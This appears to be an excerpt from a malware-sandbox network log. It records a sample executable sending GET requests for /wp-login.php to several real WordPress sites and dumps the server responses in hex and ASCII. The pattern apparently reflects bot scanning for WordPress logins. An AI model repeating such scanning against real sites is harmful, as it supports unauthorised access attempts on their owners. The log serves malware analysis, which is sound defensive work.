                                                                                                                                                                                                    2023-11-26 05:59:58 UTC162INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 39 20 43 6f 6e 66 6c 69 63 74 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 35 38 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 38 33 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 409 ConflictDate: Sun, 26 Nov 2023 05:59:58 GMTServer: ApacheContent-Length: 83Connection: closeContent-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                    2023-11-26 05:59:58 UTC83INData Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 63 6f 6f 6b 69 65 20 3d 20 22 68 75 6d 61 6e 73 5f 32 31 39 30 39 3d 31 22 3b 20 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 6c 6f 61 64 28 74 72 75 65 29 3c 2f 73 63 72 69 70 74 3e
                                                                                                                                                                                                    Data Ascii: <script>document.cookie = "humans_21909=1"; document.location.reload(true)</script>


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    525192.168.2.455752172.96.186.2064436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:58 UTC171OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: samson.pe
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:58 UTC499INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 35 38 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 63 6c 2d 62 79 70 61 73 73 2d 63 61 63 68 65 3d 79 65 73 3b 20 45 78 70 69 72 65 73 3d 53 75 6e 2c 20 32 36 2d 4e 6f 76 2d 32 33 20 30 36 3a 35 39 3a 35 38 20 47 4d 54 3b 20 44 6f 6d 61 69 6e 3d 73 61 6d 73 6f 6e 2e 70 65 3b 20 50 61 74 68 3d 2f 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 61 6d 65 53 69 74 65 3d 4c 61 78 0d 0a 53 65 72 76 65 72 3a 20 69
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:58 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeSet-Cookie: cl-bypass-cache=yes; Expires=Sun, 26-Nov-23 06:59:58 GMT; Domain=samson.pe; Path=/; HttpOnly; SameSite=LaxServer: i
                                                                                                                                                                                                    2023-11-26 05:59:58 UTC15885INData Raw: 35 30 34 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 43 61 70 74 63 68 61 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 0a 20 20 20 20 20 20 20 20 20 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f 6f 74 73 74 72 61 70 2f 33 2e 33 2e 36 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 0a 20 20 20 20 20 20 20 20 20 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 33 38 34 2d 31 71 38 6d 54 4a 4f 41 53 78 38 6a 31
                                                                                                                                                                                                    Data Ascii: 5047<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title>Captcha</title> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css" integrity="sha384-1q8mTJOASx8j1
                                                                                                                                                                                                    2023-11-26 05:59:58 UTC4679INData Raw: 36 37 31 20 43 32 39 2e 36 34 30 33 32 30 37 2c 33 38 2e 34 37 30 39 33 32 39 20 32 37 2e 34 36 36 32 38 34 31 2c 33 39 2e 39 34 30 35 34 32 37 20 32 35 2e 31 30 39 34 30 36 31 2c 34 31 2e 31 30 33 35 30 36 31 20 43 32 36 2e 33 30 33 33 32 30 37 2c 33 37 2e 31 35 34 39 33 32 39 20 32 37 2e 37 34 31 39 37 39 33 2c 33 33 2e 32 36 37 31 31 35 39 20 32 38 2e 39 39 37 32 32 33 32 2c 32 39 2e 33 34 38 39 32 30 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 46 69 6c 6c 2d 31 32 22 20 66 69 6c 6c 3d 22 23 34 36 37 43 34 35 22 3e 3c 2f 70 61 74 68 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 34 2e 39 37 31 33 33 39 30 32 2c 32 35 2e 36 34 35 35 35 20 43 39 2e 39
                                                                                                                                                                                                    Data Ascii: 671 C29.6403207,38.4709329 27.4662841,39.9405427 25.1094061,41.1035061 C26.3033207,37.1549329 27.7419793,33.2671159 28.9972232,29.3489207" id="Fill-12" fill="#467C45"></path> <path d="M4.97133902,25.64555 C9.9


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    526192.168.2.455748162.210.96.1174436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:58 UTC184OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: coralparkchristian.org
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC580INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 35 38 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 50 48 50 53 45 53 53 49 44 3d 37 61 70 32 66 37 33 6d 74 69 6c 36 36 6a 76 71 33 61 66 65 65 72 6f
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:58 GMTServer: ApachePragma: no-cacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Frame-Options: SAMEORIGINSet-Cookie: PHPSESSID=7ap2f73mtil66jvq3afeero
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC3247INData Raw: 63 61 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 0a 09 09 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 63 6c 61 73 73 3d 22 69 65 38 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 38 29 20 5d 3e 3c 21 2d 2d 3e 0a 09 09 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74
                                                                                                                                                                                                    Data Ascii: ca8<!DOCTYPE html>...[if IE 8]><html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US"><![endif]-->...[if !(IE 8) ]>...><html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">...<![endif]--><head><meta http-equiv="Cont
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    527192.168.2.45574945.40.150.544436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:58 UTC176OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: engel-firm.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:58 UTC856INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 53 65 72 76 65 72 3a 20 6f 70 65 6e 72 65 73 74 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 61 67 65 3a 20 30 0d 0a 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 0d 0a 63 6f 6e 74 65 6e 74 2d 73 65 63 75 72 69 74 79 2d 70 6f 6c 69 63 79 3a 20 75 70 67 72 61 64 65 2d 69 6e
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKServer: openrestyDate: Sun, 26 Nov 2023 06:00:00 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeage: 0cache-control: no-store, no-cache, must-revalidatecontent-security-policy: upgrade-in
                                                                                                                                                                                                    2023-11-26 05:59:58 UTC7882INData Raw: 31 65 63 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 4c 61 77 20 46 69 72 6d 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73
                                                                                                                                                                                                    Data Ascii: 1ec2<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Log In &lsaquo; Law Firm &#8212; WordPress</title><meta name='robots' content='noindex, follow' /><script type='text/javas
                                                                                                                                                                                                    2023-11-26 05:59:58 UTC593INData Raw: 32 34 61 0d 0a 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 65 6e 67 65 6c 2d 66 69 72 6d 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 77 70 2d 75 74 69 6c 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 33 2e 32 27 20 69 64 3d 27 77 70 2d 75 74 69 6c 2d 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 69 64 3d 27 75 73 65 72 2d 70 72 6f 66 69 6c 65 2d 6a 73 2d 65 78 74 72 61 27 3e 0a 2f 2a 20 3c 21 5b 43 44 41 54 41 5b 20 2a 2f 0a 76 61 72 20 75 73 65 72 50 72 6f 66 69 6c 65 4c 31 30 6e 20 3d 20 7b 22 75 73 65 72 5f 69 64 22 3a 22 30 22 2c 22 6e 6f 6e 63 65 22 3a 22 66 34 39 38 32 35 38 33 39 63 22 7d 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72
                                                                                                                                                                                                    Data Ascii: 24aipt' src='https://engel-firm.com/wp-includes/js/wp-util.min.js?ver=6.3.2' id='wp-util-js'></script><script type='text/javascript' id='user-profile-js-extra'>/* <![CDATA[ */var userProfileL10n = {"user_id":"0","nonce":"f49825839c"};/* ... */</scr
                                                                                                                                                                                                    2023-11-26 05:59:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                    Data Ascii: 0


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    528192.168.2.455727213.0.13.444436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:58 UTC184OUTGET /wp/wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: www.ceuandalucia.es
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC542INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 35 38 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 35 2e 34 2e 34 35 2d 30 2b 64 65 62 37 75 31 34 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 74 65 73 74 5f 63 6f 6f 6b 69 65 3d 57 50 2b 43 6f 6f 6b 69 65 2b 63 68 65 63 6b 3b 20 70 61 74 68 3d
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:58 GMTServer: ApacheX-Powered-By: PHP/5.4.45-0+deb7u14Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC6439INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 0a 09 09 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 63 6c 61 73 73 3d 22 69 65 38 22 20 6c 61 6e 67 3d 22 65 73 22 20 78 6d 6c 6e 73 3a 6f 67 3d 22 68 74 74 70 3a 2f 2f 6f 70 65 6e 67 72 61 70 68 70 72 6f 74 6f 63 6f 6c 2e 6f 72 67 2f 73 63 68 65 6d 61 2f 22 20 78 6d 6c 6e 73 3a 66 62 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 32 30 30 38 2f 66 62 6d 6c 22 3e 0a 09 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 09 3c 21 2d 2d 5b 69 66 20 21 28 49 45 20 38 29 20 5d 3e 3c 21 2d 2d 3e 0a 09 09 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html>...[if IE 8]><html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="es" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"><![endif]-->...[if !(IE 8) ]>...><html xmlns="http://w


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    529192.168.2.456099162.250.126.54436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:58 UTC180OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: mydirectlender.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:58 UTC508INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 35 37 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 0d 0a 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 63 68 75 6e 6b 65 64 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 63 6c 2d 62 79 70 61 73 73 2d 63 61 63 68 65 3d 79 65 73 3b 20 45 78 70 69 72 65 73 3d 53 75 6e 2c 20 32 36 2d 4e 6f 76 2d 32 33 20 30 36 3a 35 39 3a 35 37 20 47 4d 54 3b 20 44 6f 6d 61 69 6e 3d 6d 79 64 69 72 65 63 74 6c 65 6e 64 65 72 2e 63 6f 6d 3b 20 50 61 74 68 3d 2f 3b 20 48 74 74 70 4f 6e 6c 79 3b 20 53 61 6d 65 53 69 74 65 3d 4c 61 78 0d 0a
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:57 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeSet-Cookie: cl-bypass-cache=yes; Expires=Sun, 26-Nov-23 06:59:57 GMT; Domain=mydirectlender.com; Path=/; HttpOnly; SameSite=Lax
                                                                                                                                                                                                    2023-11-26 05:59:58 UTC15876INData Raw: 34 66 64 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 43 61 70 74 63 68 61 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 0a 20 20 20 20 20 20 20 20 20 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f 6f 74 73 74 72 61 70 2f 33 2e 33 2e 36 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 22 0a 20 20 20 20 20 20 20 20 20 20 69 6e 74 65 67 72 69 74 79 3d 22 73 68 61 33 38 34 2d 31 71 38 6d 54 4a 4f 41 53 78 38 6a 31
                                                                                                                                                                                                    Data Ascii: 4fd0<!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <title>Captcha</title> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.6/css/bootstrap.min.css" integrity="sha384-1q8mTJOASx8j1
                                                                                                                                                                                                    2023-11-26 05:59:58 UTC4569INData Raw: 37 31 31 35 39 20 32 38 2e 39 39 37 32 32 33 32 2c 32 39 2e 33 34 38 39 32 30 37 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 46 69 6c 6c 2d 31 32 22 20 66 69 6c 6c 3d 22 23 34 36 37 43 34 35 22 3e 3c 2f 70 61 74 68 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 64 3d 22 4d 34 2e 39 37 31 33 33 39 30 32 2c 32 35 2e 36 34 35 35 35 20 43 39 2e 39 33 33 38 35 31 32 32 2c 32 37 2e 31 38 37 33 37 39 33 20 31 34 2e 37 37 33 37 30 34 39 2c 32 39 2e 30 33 36 34 32 38 20 31 39 2e 36 37 34 38 38 37 38 2c 33 30 2e 36 37 30 35 33 37 38 20 43 32 30 2e 34 31 34 38 35 31 32 2c 33 30 2e 39 31 37 30 30 31 32 20 32 31 2e 31 35 34 32 34 31 35 2c 33 31 2e 31 39 34 34 31 35 39 20 32 31 2e
                                                                                                                                                                                                    Data Ascii: 71159 28.9972232,29.3489207" id="Fill-12" fill="#467C45"></path> <path d="M4.97133902,25.64555 C9.93385122,27.1873793 14.7737049,29.036428 19.6748878,30.6705378 C20.4148512,30.9170012 21.1542415,31.1944159 21.


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    530192.168.2.456103144.202.62.1314436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:58 UTC182OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: gruporegiosafety.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC352INData Raw: 48 54 54 50 2f 31 2e 31 20 32 30 30 20 4f 4b 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 35 38 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 58 2d 46 72 61 6d 65 2d 4f 70 74 69 6f 6e 73 3a 20 53 41 4d 45 4f 52 49 47 49 4e 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 77 6f 72 64 70 72 65 73 73 5f 74 65 73 74 5f 63 6f 6f 6b 69 65 3d 57 50 25 32 30 43 6f 6f 6b 69 65 25 32 30 63 68 65 63 6b 3b 20 70 61 74 68 3d 2f 3b 20
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 200 OKDate: Sun, 26 Nov 2023 05:59:58 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0X-Frame-Options: SAMEORIGINSet-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/;
                                                                                                                                                                                                    2023-11-26 05:59:59 UTC7840INData Raw: 32 38 32 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 2d 4d 58 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 41 63 63 65 64 65 72 20 26 6c 73 61 71 75 6f 3b 20 47 52 55 50 4f 20 52 45 47 49 4f 20 53 41 46 45 54 59 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 2e 6c 6f 67 69 6e 2d 61 63 74 69 6f 6e 2d 6c 6f 73 74 70 61 73 73 77 6f 72 64 20 23 6c 6f 67 69 6e 5f 65 72 72 6f 72 7b 0a 20 20
                                                                                                                                                                                                    Data Ascii: 282a<!DOCTYPE html><html lang="es-MX"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><title>Acceder &lsaquo; GRUPO REGIO SAFETY &#8212; WordPress</title> <style> .login-action-lostpassword #login_error{
